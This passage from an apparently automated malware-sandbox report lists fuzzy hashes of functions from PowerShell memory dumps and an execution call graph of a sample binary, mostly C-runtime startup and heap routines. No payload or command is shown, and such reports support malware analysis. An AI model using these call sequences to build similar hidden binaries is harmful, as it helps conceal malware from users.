                                                            • Snapshot File: hcaresult_14_2_7ffd9b4a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 27a561fd41098f60725ea7fb67cefdcc640fd8dfa4a0fd029ad0b850fc06205a
                                                            • Instruction ID: 9a2f703fb1cf07762f4d8f55f394f67d5a2fad2f84da527b0b86a75d21316806
                                                            • Opcode Fuzzy Hash: 27a561fd41098f60725ea7fb67cefdcc640fd8dfa4a0fd029ad0b850fc06205a
                                                            • Instruction Fuzzy Hash: 9521D222F0FA9E4FE7B9DA9C447117867C5EF84218B5A01BED15DC75E2DE28EC009381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DB5C1 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32f6d73c87dd58e8ae7eb3b839910b478593b727fdc173700e60ebffdc0c697b
                                                            • Instruction ID: 70e38bdafc6bf62e187f8ec2b4d9775fce6c8dca7318fb3915d21271d9c3f3b5
                                                            • Opcode Fuzzy Hash: 32f6d73c87dd58e8ae7eb3b839910b478593b727fdc173700e60ebffdc0c697b
                                                            • Instruction Fuzzy Hash: 2A210C31A1894D8FDF98EB58C451EED77A1FF68304F1501A9D409D7296DA25EC82CBC1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4A473C Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2566535279.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b4a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c9723284467c50015312d6bd7dd9a521617cda96d3fc1608e90ae3fb3c71f43
                                                            • Instruction ID: 9326c732c6dacd93edf3076922047198a629c06ab70ee7697cab1ab8aa837879
                                                            • Opcode Fuzzy Hash: 6c9723284467c50015312d6bd7dd9a521617cda96d3fc1608e90ae3fb3c71f43
                                                            • Instruction Fuzzy Hash: 2E110632F0F9C94FE7B4D75884645B977D1EF4221474A00BED0ADC74A6DA19BC409781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3D3475 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                            • Instruction ID: 364805bc85579c9078f2d94b88caeef1c9f4daaadea2cc1c55edfe79d2084662
                                                            • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                            • Instruction Fuzzy Hash: DF01A73021CB0C8FD748EF4CE051AA5B7E0FB95360F10056EE58AC36A1D636E881CB41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DAEF8 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 047f7a125f6393d0166ceec073d779628cac7c0988d38e7e4c15d1c2d797094d
                                                            • Instruction ID: 5c1e65884ad1d8d607bb401f89297c6d36fc250583d111414aefde4d28a0d814
                                                            • Opcode Fuzzy Hash: 047f7a125f6393d0166ceec073d779628cac7c0988d38e7e4c15d1c2d797094d
                                                            • Instruction Fuzzy Hash: 84F0373275C6084FDB5CAA1CF4529B573D1E795320B10056EE48BC3696D927E842C685
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B3DA708 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a6bd977ceb194e3641a88ea7538f1ae27263c025af3317511c61838d733ac140
                                                            • Instruction ID: aff0e66d8e9b812b5b2212ae5f0ebed00af12b119e47825669f9c7b3ad05aba4
                                                            • Opcode Fuzzy Hash: a6bd977ceb194e3641a88ea7538f1ae27263c025af3317511c61838d733ac140
                                                            • Instruction Fuzzy Hash: 39F0F6348086CD8FDB16DF6888194D57FE0EF16320B0503DAD458C70B2DB659558C782
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:11.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:7.1%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:26
                                                            execution_graph 20926 401044 20929 419ba6 20926->20929 20932 419b6b 20929->20932 20933 419b88 20932->20933 20934 419b8f 20932->20934 20938 41c80b 20933->20938 20941 41c88d 20934->20941 20937 40104e 20939 41c88d __onexit 29 API calls 20938->20939 20940 41c81d 20939->20940 20940->20937 20944 41c555 20941->20944 20943 41c8be 20943->20937 20945 41c561 BuildCatchObjectHelperInternal 20944->20945 20952 41d7fe EnterCriticalSection 20945->20952 20947 41c56f 20953 41c5a6 20947->20953 20949 41c57c 20963 41c59a 20949->20963 20951 41c58d __onexit 20951->20943 20952->20947 20954 41c5bc pre_c_initialization __crt_fast_encode_pointer 20953->20954 20956 41c5c4 20953->20956 20954->20949 20955 41c61d 20955->20954 20958 41fc45 __onexit 29 API calls 20955->20958 20956->20954 20956->20955 20966 41fc45 20956->20966 20960 41c633 20958->20960 20959 41c613 20961 41d8ba _free 20 API calls 20959->20961 20962 41d8ba _free 20 API calls 20960->20962 20961->20955 20962->20954 20995 41d846 LeaveCriticalSection 20963->20995 20965 41c5a4 20965->20951 20967 41fc50 20966->20967 20968 41fc78 20967->20968 20969 41fc69 20967->20969 20970 41fc87 20968->20970 20975 421a30 20968->20975 20971 41cfc3 __strnicoll 20 API calls 20969->20971 20983 41dffa 20970->20983 20974 41fc6e ___scrt_fastfail 20971->20974 20974->20959 20976 421a3b 20975->20976 20977 421a46 20976->20977 20978 421a5b HeapSize 20976->20978 20979 41cfc3 __strnicoll 20 API calls 20977->20979 20978->20970 20980 421a4b 20979->20980 20981 41cf06 __strnicoll 26 API calls 20980->20981 20982 421a56 20981->20982 20982->20970 20984 41e012 20983->20984 20985 41e007 20983->20985 20987 41e01a 20984->20987 20993 41e023 __strnicoll 20984->20993 20986 41dfac __strnicoll 21 API calls 20985->20986 20991 41e00f 20986->20991 20988 41d8ba _free 20 API calls 20987->20988 20988->20991 20989 41e028 20992 41cfc3 __strnicoll 20 API calls 20989->20992 20990 41e04d HeapReAlloc 20990->20991 20990->20993 20991->20974 20992->20991 20993->20989 20993->20990 20994 41b5da __strnicoll 7 API calls 20993->20994 20994->20993 20995->20965 17518 419e44 17519 419e50 BuildCatchObjectHelperInternal 17518->17519 17548 4199b4 17519->17548 17521 419e57 17522 419fb0 17521->17522 17525 419e81 17521->17525 17595 41a4a5 IsProcessorFeaturePresent 17522->17595 17524 419fb7 17576 41bf21 17524->17576 17534 419ec0 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 17525->17534 17559 41cb06 17525->17559 17532 419ea0 17535 419f21 17534->17535 17579 41bee9 17534->17579 17567 41c4eb 17535->17567 17540 419f3e 17584 41a5c7 GetModuleHandleW 17540->17584 17543 419f4c 17544 419f55 17543->17544 17586 41bec4 17543->17586 17589 419b43 17544->17589 17549 4199bd 17548->17549 17602 419fd0 IsProcessorFeaturePresent 17549->17602 17553 4199ce 17554 4199d2 17553->17554 17613 41c9ce 17553->17613 17554->17521 17557 4199e9 17557->17521 17560 41cb1d 17559->17560 17561 41a167 CatchGuardHandler 5 API calls 17560->17561 17562 419e9a 17561->17562 17562->17532 17563 41caaa 17562->17563 17565 41cad9 17563->17565 17564 41a167 CatchGuardHandler 5 API calls 17566 41cb02 17564->17566 17565->17564 17566->17534 17568 41c4f4 17567->17568 17569 419f35 17567->17569 17897 41c23b 17568->17897 17571 40763a GetModuleHandleW GetProcAddress FreeConsole GetTickCount 17569->17571 17572 407663 17571->17572 17573 40767f 17571->17573 17572->17573 18219 4066cf 17572->18219 17573->17540 17575 40767b 17575->17540 20599 41bd50 17576->20599 17580 41ba0a BuildCatchObjectHelperInternal 17579->17580 17581 41bf11 pre_c_initialization 17579->17581 17582 41d453 pre_c_initialization 23 API calls 17580->17582 17581->17535 17583 41ba1b 17582->17583 17585 419f48 17584->17585 17585->17524 17585->17543 17587 41bd50 FindHandlerForForeignException 29 API calls 17586->17587 17588 41becf 17587->17588 17588->17544 17590 419b4f 17589->17590 17594 419b65 17590->17594 20686 41c9e0 17590->20686 17592 419b5d 17593 424733 ___vcrt_uninitialize 8 API calls 17592->17593 17593->17594 17594->17532 17596 41a4ba ___scrt_fastfail 17595->17596 17597 41a565 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17596->17597 17598 41a5b0 ___scrt_fastfail 17597->17598 17598->17524 17603 4199c9 17602->17603 17604 42470a 17603->17604 17605 42470f ___vcrt_initialize_winapi_thunks 17604->17605 17624 419887 17605->17624 17608 42471d 17608->17553 17610 424725 17611 424730 17610->17611 17638 4198c3 17610->17638 17611->17553 17679 41fcd8 17613->17679 17616 424733 17617 42474d 17616->17617 17618 42473c 17616->17618 17617->17554 17619 418007 ___vcrt_uninitialize_ptd 6 API calls 17618->17619 17620 424741 17619->17620 17621 4198c3 ___vcrt_uninitialize_locks DeleteCriticalSection 17620->17621 17622 424746 17621->17622 17893 4191ba 17622->17893 17626 419890 17624->17626 17627 4198b9 17626->17627 17628 4198b5 17626->17628 17642 41914a 17626->17642 17629 4198c3 ___vcrt_uninitialize_locks DeleteCriticalSection 17627->17629 17628->17608 17630 417fd4 17628->17630 17629->17628 17660 41905b 17630->17660 17635 418004 17635->17610 17637 417fe9 17637->17610 17639 4198ed 17638->17639 17640 4198ce 17638->17640 17639->17608 17641 4198d8 DeleteCriticalSection 17640->17641 17641->17639 17641->17641 17647 418fec 17642->17647 17644 419164 17645 419182 InitializeCriticalSectionAndSpinCount 17644->17645 17646 41916d 17644->17646 17645->17646 17646->17626 17648 419014 17647->17648 17652 419010 __crt_fast_encode_pointer 17647->17652 17648->17652 17653 418f28 17648->17653 17651 41902e GetProcAddress 17651->17652 17652->17644 17657 418f37 17653->17657 17654 418fe1 17654->17651 17654->17652 17655 418f54 LoadLibraryExW 17656 418f6f GetLastError 17655->17656 17655->17657 17656->17657 17657->17654 17657->17655 17658 418fca FreeLibrary 17657->17658 17659 418fa2 LoadLibraryExW 17657->17659 17658->17657 17659->17657 17661 418fec try_get_function 5 API calls 17660->17661 17662 419075 17661->17662 17663 41908e TlsAlloc 17662->17663 17664 417fde 17662->17664 17664->17637 17665 41910c 17664->17665 17666 418fec try_get_function 5 API calls 17665->17666 17667 419126 17666->17667 17668 419141 TlsSetValue 17667->17668 17669 417ff7 17667->17669 17668->17669 17669->17635 17670 418007 17669->17670 17671 418011 17670->17671 17672 418017 17670->17672 17674 419096 17671->17674 17672->17637 17675 418fec try_get_function 5 API calls 17674->17675 17676 4190b0 17675->17676 17677 4190c8 TlsFree 17676->17677 17678 4190bc 17676->17678 17677->17678 17678->17672 17682 41fcf5 17679->17682 17683 41fcf1 17679->17683 17681 4199db 17681->17557 17681->17616 17682->17683 17686 41e9ca 17682->17686 17691 41ea7e 17682->17691 17703 41a167 17683->17703 17687 41e9d1 17686->17687 17688 41ea14 GetStdHandle 17687->17688 17689 41ea7a 17687->17689 17690 41ea27 GetFileType 17687->17690 17688->17687 17689->17682 17690->17687 17692 41ea8a BuildCatchObjectHelperInternal 17691->17692 17710 41d7fe EnterCriticalSection 17692->17710 17694 41ea91 17711 4200cc 17694->17711 17696 41eaa0 17697 41eaaf 17696->17697 17724 41e912 GetStartupInfoW 17696->17724 17730 41eacb 17697->17730 17700 41eac0 __onexit 17700->17682 17702 41e9ca 2 API calls 17702->17697 17704 41a170 17703->17704 17705 41a172 IsProcessorFeaturePresent 17703->17705 17704->17681 17707 41a7fc 17705->17707 17892 41a7c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17707->17892 17709 41a8df 17709->17681 17710->17694 17712 4200d8 BuildCatchObjectHelperInternal 17711->17712 17713 4200e1 17712->17713 17714 4200f8 17712->17714 17741 41cfc3 17713->17741 17733 41d7fe EnterCriticalSection 17714->17733 17718 420104 17720 420130 17718->17720 17734 42001d 17718->17734 17747 420157 17720->17747 17721 4200f0 __onexit 17721->17696 17725 41e9c3 17724->17725 17726 41e92f 17724->17726 17725->17702 17726->17725 17727 4200cc 27 API calls 17726->17727 17728 41e957 17727->17728 17728->17725 17729 41e987 GetFileType 17728->17729 17729->17728 17891 41d846 LeaveCriticalSection 17730->17891 17732 41ead2 17732->17700 17733->17718 17750 41d85d 17734->17750 17736 42002f 17740 42003c 17736->17740 17757 41dd09 17736->17757 17738 42008e 17738->17718 17764 41d8ba 17740->17764 17798 41d5a1 GetLastError 17741->17798 17744 41cf06 17869 41ce8b 17744->17869 17746 41cf12 17746->17721 17890 41d846 LeaveCriticalSection 17747->17890 17749 42015e 17749->17721 17755 41d86a __strnicoll 17750->17755 17751 41d8aa 17754 41cfc3 __strnicoll 19 API calls 17751->17754 17752 41d895 RtlAllocateHeap 17753 41d8a8 17752->17753 17752->17755 17753->17736 17754->17753 17755->17751 17755->17752 17770 41b5da 17755->17770 17785 41da0a 17757->17785 17759 41dd30 17760 41dd4e InitializeCriticalSectionAndSpinCount 17759->17760 17761 41dd39 17759->17761 17760->17761 17762 41a167 CatchGuardHandler 5 API calls 17761->17762 17763 41dd65 17762->17763 17763->17736 17765 41d8ee _free 17764->17765 17766 41d8c5 HeapFree 17764->17766 17765->17738 17766->17765 17767 41d8da 17766->17767 17768 41cfc3 __strnicoll 18 API calls 17767->17768 17769 41d8e0 GetLastError 17768->17769 17769->17765 17775 41b61e 17770->17775 17772 41b5f0 17773 41a167 CatchGuardHandler 5 API calls 17772->17773 17774 41b61a 17773->17774 17774->17755 17776 41b62a BuildCatchObjectHelperInternal 17775->17776 17781 41d7fe EnterCriticalSection 17776->17781 17778 41b635 17782 41b667 17778->17782 17780 41b65c __onexit 17780->17772 17781->17778 17783 41d846 FindHandlerForForeignException LeaveCriticalSection 17782->17783 17784 41b66e 17783->17784 17784->17780 17786 41da37 17785->17786 17790 41da33 __crt_fast_encode_pointer 17785->17790 17786->17790 17791 41d942 17786->17791 17789 41da51 GetProcAddress 17789->17790 17790->17759 17796 41d953 17791->17796 17792 41d9fd 17792->17789 17792->17790 17793 41d970 LoadLibraryExW 17794 41d98b GetLastError 17793->17794 17793->17796 17794->17796 17795 41d9e6 FreeLibrary 17795->17796 17796->17792 17796->17793 17796->17795 17797 41d9be LoadLibraryExW 17796->17797 17797->17796 17799 41d5ba 17798->17799 17803 41d5c0 17798->17803 17824 41dc5a 17799->17824 17804 41d5c6 17803->17804 17831 41dcb0 17803->17831 17805 41d5cb SetLastError 17804->17805 17809 41d64b SetLastError 17804->17809 17806 41cfc8 17805->17806 17806->17744 17807 41d85d __strnicoll 17 API calls 17808 41d5f7 17807->17808 17810 41d614 17808->17810 17811 41d5ff 17808->17811 17809->17806 17812 41dcb0 __strnicoll 11 API calls 17810->17812 17813 41dcb0 __strnicoll 11 API calls 17811->17813 17814 41d620 17812->17814 17815 41d60b 17813->17815 17816 41d633 17814->17816 17817 41d624 17814->17817 17820 41d8ba _free 17 API calls 17815->17820 17838 41d27d 17816->17838 17818 41dcb0 __strnicoll 11 API calls 17817->17818 17818->17815 17822 41d611 17820->17822 17822->17805 17823 41d8ba _free 17 API calls 17823->17804 17825 41da0a __strnicoll 5 API calls 17824->17825 17826 41dc81 17825->17826 17827 41dc99 TlsGetValue 17826->17827 17828 41dc8d 17826->17828 17827->17828 17829 41a167 CatchGuardHandler 5 API calls 17828->17829 17830 41dcaa 17829->17830 17830->17803 17832 41da0a __strnicoll 5 API calls 17831->17832 17833 41dcd7 17832->17833 17834 41dcf2 TlsSetValue 17833->17834 17835 41dce6 17833->17835 17834->17835 17836 41a167 CatchGuardHandler 5 API calls 17835->17836 17837 41d5e7 17836->17837 17837->17805 17837->17807 17843 41d139 17838->17843 17840 41d2eb 17849 41d22d 17840->17849 17842 41d314 17842->17823 17844 41d145 BuildCatchObjectHelperInternal 17843->17844 17857 41d7fe EnterCriticalSection 17844->17857 17846 41d14f 17858 41d175 17846->17858 17848 41d16d __onexit 17848->17840 17850 41d239 BuildCatchObjectHelperInternal 17849->17850 17861 41d7fe EnterCriticalSection 17850->17861 17852 41d243 17862 41d408 17852->17862 17854 41d25b 17866 41d271 17854->17866 17856 41d269 __onexit 17856->17842 17857->17846 17859 41d846 FindHandlerForForeignException LeaveCriticalSection 17858->17859 17860 41d17f 17859->17860 17860->17848 17861->17852 17863 41d43e __strnicoll 17862->17863 17864 41d417 __strnicoll 17862->17864 17863->17854 17864->17863 17865 4206c5 __strnicoll 20 API calls 17864->17865 17865->17863 17867 41d846 FindHandlerForForeignException LeaveCriticalSection 17866->17867 17868 41d27b 17867->17868 17868->17856 17870 41d5a1 __strnicoll 20 API calls 17869->17870 17871 41cea1 17870->17871 17872 41cf00 17871->17872 17873 41ceaf 17871->17873 17880 41cf16 IsProcessorFeaturePresent 17872->17880 17877 41a167 CatchGuardHandler 5 API calls 17873->17877 17875 41cf05 17876 41ce8b __strnicoll 26 API calls 17875->17876 17878 41cf12 17876->17878 17879 41ced6 17877->17879 17878->17746 17879->17746 17881 41cf22 17880->17881 17884 41cd41 17881->17884 17885 41cd5d ___scrt_fastfail 17884->17885 17886 41cd89 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17885->17886 17887 41ce5a ___scrt_fastfail 17886->17887 17888 41a167 CatchGuardHandler 5 API calls 17887->17888 17889 41ce78 GetCurrentProcess TerminateProcess 17888->17889 17889->17875 17890->17749 17891->17732 17892->17709 17894 4191e9 17893->17894 17896 4191c3 17893->17896 17894->17617 17895 4191d3 FreeLibrary 17895->17896 17896->17894 17896->17895 17898 41c244 17897->17898 17901 41c24c 17897->17901 17898->17901 17903 41c267 17898->17903 17900 41c254 17900->17901 17916 41c3ba 17900->17916 17901->17569 17904 41c270 17903->17904 17905 41c273 17903->17905 17904->17900 17926 41f4db 17905->17926 17911 41d8ba _free 20 API calls 17913 41c2b4 17911->17913 17913->17900 17914 41d8ba _free 20 API calls 17915 41c285 17914->17915 17915->17911 17917 41c3c7 17916->17917 17920 41c3cc 17916->17920 17917->17901 17918 41c3d2 WideCharToMultiByte 17919 41c427 17918->17919 17918->17920 17919->17901 17920->17918 17920->17919 17921 41d85d __strnicoll 20 API calls 17920->17921 17922 41c3f8 WideCharToMultiByte 17920->17922 17923 41c42d 17920->17923 17925 41d8ba _free 20 API calls 17920->17925 17921->17920 17922->17920 17922->17923 17924 41d8ba _free 20 API calls 17923->17924 17924->17919 17925->17920 17927 41f4e4 17926->17927 17931 41c27a 17926->17931 17961 41d507 17927->17961 17929 41f507 17983 41f32d 17929->17983 17932 41f859 GetEnvironmentStringsW 17931->17932 17933 41f870 17932->17933 17943 41f8c3 17932->17943 17936 41f876 WideCharToMultiByte 17933->17936 17934 41c27f 17934->17915 17944 41c2ba 17934->17944 17935 41f8cc FreeEnvironmentStringsW 17935->17934 17937 41f892 17936->17937 17936->17943 17938 41dfac __strnicoll 21 API calls 17937->17938 17939 41f898 17938->17939 17940 41f8b5 17939->17940 17941 41f89f WideCharToMultiByte 17939->17941 17942 41d8ba _free 20 API calls 17940->17942 17941->17940 17942->17943 17943->17934 17943->17935 17945 41c2cf 17944->17945 17946 41d85d __strnicoll 20 API calls 17945->17946 17956 41c2f6 17946->17956 17947 41c35a 17948 41d8ba _free 20 API calls 17947->17948 17949 41c290 17948->17949 17949->17914 17950 41d85d __strnicoll 20 API calls 17950->17956 17951 41c35c 18213 41c38b 17951->18213 17955 41d8ba _free 20 API calls 17955->17947 17956->17947 17956->17950 17956->17951 17957 41c37e 17956->17957 17959 41d8ba _free 20 API calls 17956->17959 18204 41ba51 17956->18204 17958 41cf16 __strnicoll 11 API calls 17957->17958 17960 41c38a 17958->17960 17959->17956 17962 41d512 17961->17962 17963 41d518 17961->17963 17964 41dc5a __strnicoll 11 API calls 17962->17964 17965 41dcb0 __strnicoll 11 API calls 17963->17965 17968 41d51e 17963->17968 17964->17963 17966 41d532 17965->17966 17967 41d85d __strnicoll 20 API calls 17966->17967 17966->17968 17969 41d542 17967->17969 17968->17929 17970 41d54a 17969->17970 17971 41d55f 17969->17971 17973 41dcb0 __strnicoll 11 API calls 17970->17973 17972 41dcb0 __strnicoll 11 API calls 17971->17972 17974 41d56b 17972->17974 17975 41d556 17973->17975 17976 41d56f 17974->17976 17977 41d57e 17974->17977 17980 41d8ba _free 20 API calls 17975->17980 17978 41dcb0 __strnicoll 11 API calls 17976->17978 17979 41d27d __strnicoll 20 API calls 17977->17979 17978->17975 17981 41d589 17979->17981 17980->17968 17982 41d8ba _free 20 API calls 17981->17982 17982->17968 18001 41f448 17983->18001 17985 41f340 18007 41f0c1 17985->18007 17988 41f359 17988->17931 17993 41d8ba _free 20 API calls 17993->17988 17994 41f397 17995 41cfc3 __strnicoll 20 API calls 17994->17995 17997 41f39c 17995->17997 17996 41f3b4 17998 41f3e0 17996->17998 17999 41d8ba _free 20 API calls 17996->17999 17997->17993 17998->17997 18032 41efbd 17998->18032 17999->17998 18005 41f454 BuildCatchObjectHelperInternal 18001->18005 18003 41f4d3 __onexit 18003->17985 18005->18003 18006 41d8ba _free 20 API calls 18005->18006 18040 41d7fe EnterCriticalSection 18005->18040 18041 41f4ca 18005->18041 18006->18005 18045 41aff9 18007->18045 18010 41f0e2 GetOEMCP 18012 41f10b 18010->18012 18011 41f0f4 18011->18012 18013 41f0f9 GetACP 18011->18013 18012->17988 18014 41dfac 18012->18014 18013->18012 18015 41dfea 18014->18015 18020 41dfba __strnicoll 18014->18020 18017 41cfc3 __strnicoll 20 API calls 18015->18017 18016 41dfd5 RtlAllocateHeap 18018 41dfe8 18016->18018 18016->18020 18017->18018 18018->17997 18021 41f536 18018->18021 18019 41b5da __strnicoll 7 API calls 18019->18020 18020->18015 18020->18016 18020->18019 18022 41f0c1 25 API calls 18021->18022 18023 41f555 18022->18023 18026 41f5b3 IsValidCodePage 18023->18026 18027 41f5a5 GetACP 18023->18027 18029 41f55f 18023->18029 18031 41f5d8 ___scrt_fastfail 18023->18031 18024 41a167 CatchGuardHandler 5 API calls 18025 41f38f 18024->18025 18025->17994 18025->17996 18028 41f5c5 GetCPInfo 18026->18028 18026->18029 18027->18026 18027->18029 18028->18029 18028->18031 18029->18024 18110 41f199 GetCPInfo 18031->18110 18033 41efc9 BuildCatchObjectHelperInternal 18032->18033 18178 41d7fe EnterCriticalSection 18033->18178 18035 41efd3 18179 41f000 18035->18179 18039 41efec __onexit 18039->17997 18040->18005 18044 41d846 LeaveCriticalSection 18041->18044 18043 41f4d1 18043->18005 18044->18043 18046 41b016 18045->18046 18052 41b00c 18045->18052 18046->18052 18053 41d453 GetLastError 18046->18053 18048 41b037 18079 41d69a 18048->18079 18052->18010 18052->18011 18054 41d46f 18053->18054 18055 41d469 18053->18055 18057 41dcb0 __strnicoll 11 API calls 18054->18057 18078 41d475 18054->18078 18056 41dc5a __strnicoll 11 API calls 18055->18056 18056->18054 18058 41d489 18057->18058 18059 41d4fa SetLastError 18058->18059 18062 41d85d __strnicoll 20 API calls 18058->18062 18060 41d506 18059->18060 18061 41d47a 18061->18059 18064 41d499 18062->18064 18063 41d4ee SetLastError 18063->18048 18065 41d4a1 18064->18065 18066 41d4b6 18064->18066 18067 41dcb0 __strnicoll 11 API calls 18065->18067 18068 41dcb0 __strnicoll 11 API calls 18066->18068 18075 41d4ad 18067->18075 18069 41d4c2 18068->18069 18070 41d4d5 18069->18070 18071 41d4c6 18069->18071 18074 41d27d __strnicoll 20 API calls 18070->18074 18073 41dcb0 __strnicoll 11 API calls 18071->18073 18072 41d8ba _free 20 API calls 18072->18061 18073->18075 18076 41d4e0 18074->18076 18075->18072 18077 41d8ba _free 20 API calls 18076->18077 18077->18078 18078->18059 18078->18061 18078->18063 18080 41b050 18079->18080 18081 41d6ad 18079->18081 18083 41d6c7 18080->18083 18081->18080 18087 420912 18081->18087 18084 41d6ef 18083->18084 18085 41d6da 18083->18085 18084->18052 18085->18084 18105 41f523 18085->18105 18088 42091e BuildCatchObjectHelperInternal 18087->18088 18089 41d453 pre_c_initialization 23 API calls 18088->18089 18090 420927 18089->18090 18096 42096c __onexit 18090->18096 18097 41d7fe EnterCriticalSection 18090->18097 18092 420945 18098 420989 18092->18098 18096->18080 18097->18092 18099 420997 __strnicoll 18098->18099 18101 420959 18098->18101 18100 4206c5 __strnicoll 20 API calls 18099->18100 18099->18101 18100->18101 18102 420978 18101->18102 18103 41d846 FindHandlerForForeignException LeaveCriticalSection 18102->18103 18104 42097f 18103->18104 18104->18096 18106 41d453 pre_c_initialization 23 API calls 18105->18106 18107 41f52d 18106->18107 18108 41f448 __strnicoll 20 API calls 18107->18108 18109 41f533 18108->18109 18109->18084 18111 41f27d 18110->18111 18116 41f1d3 18110->18116 18113 41a167 CatchGuardHandler 5 API calls 18111->18113 18115 41f329 18113->18115 18115->18029 18120 420524 18116->18120 18119 421174 __strnicoll 28 API calls 18119->18111 18121 41aff9 __strnicoll 23 API calls 18120->18121 18122 420544 MultiByteToWideChar 18121->18122 18125 42057d 18122->18125 18130 420601 18122->18130 18124 41a167 CatchGuardHandler 5 API calls 18127 41f234 18124->18127 18126 41dfac __strnicoll 21 API calls 18125->18126 18131 420595 __strnicoll ___scrt_fastfail 18125->18131 18126->18131 18134 421174 18127->18134 18128 4205fb 18139 420628 18128->18139 18130->18124 18131->18128 18132 4205d1 MultiByteToWideChar 18131->18132 18132->18128 18133 4205eb GetStringTypeW 18132->18133 18133->18128 18135 41aff9 __strnicoll 23 API calls 18134->18135 18136 421187 18135->18136 18143 420f8e 18136->18143 18140 420645 18139->18140 18141 420634 18139->18141 18140->18130 18141->18140 18142 41d8ba _free 20 API calls 18141->18142 18142->18140 18144 420fa9 __strnicoll 18143->18144 18145 420fcf MultiByteToWideChar 18144->18145 18146 420ffb 18145->18146 18147 42114c 18145->18147 18150 41dfac __strnicoll 21 API calls 18146->18150 18154 421010 __strnicoll 18146->18154 18148 41a167 CatchGuardHandler 5 API calls 18147->18148 18149 41f255 18148->18149 18149->18119 18150->18154 18151 4210b3 18156 420628 __freea 20 API calls 18151->18156 18152 421048 MultiByteToWideChar 18152->18151 18153 42105f 18152->18153 18170 41dd6b 18153->18170 18154->18151 18154->18152 18156->18147 18158 4210c2 18162 41dfac __strnicoll 21 API calls 18158->18162 18165 4210d4 __strnicoll 18158->18165 18159 42108a 18159->18151 18160 41dd6b __strnicoll 11 API calls 18159->18160 18160->18151 18161 42113d 18164 420628 __freea 20 API calls 18161->18164 18162->18165 18163 41dd6b __strnicoll 11 API calls 18166 42111c 18163->18166 18164->18151 18165->18161 18165->18163 18166->18161 18167 42112b WideCharToMultiByte 18166->18167 18167->18161 18168 42116b 18167->18168 18169 420628 __freea 20 API calls 18168->18169 18169->18151 18171 41d90e __strnicoll 5 API calls 18170->18171 18172 41dd81 18171->18172 18173 41dddf __strnicoll 10 API calls 18172->18173 18175 41dd87 18172->18175 18174 41ddc7 LCMapStringW 18173->18174 18174->18175 18176 41a167 CatchGuardHandler 5 API calls 18175->18176 18177 41ddd9 18176->18177 18177->18151 18177->18158 18177->18159 18178->18035 18189 41f730 18179->18189 18181 41f022 18182 41f730 26 API calls 18181->18182 18183 41f041 18182->18183 18184 41d8ba _free 20 API calls 18183->18184 18185 41efe0 18183->18185 18184->18185 18186 41eff4 18185->18186 18203 41d846 LeaveCriticalSection 18186->18203 18188 41effe 18188->18039 18190 41f741 18189->18190 18194 41f73d 18189->18194 18191 41f748 18190->18191 18196 41f75b ___scrt_fastfail 18190->18196 18192 41cfc3 __strnicoll 20 API calls 18191->18192 18193 41f74d 18192->18193 18195 41cf06 __strnicoll 26 API calls 18193->18195 18194->18181 18195->18194 18196->18194 18197 41f792 18196->18197 18198 41f789 18196->18198 18197->18194 18201 41cfc3 __strnicoll 20 API calls 18197->18201 18199 41cfc3 __strnicoll 20 API calls 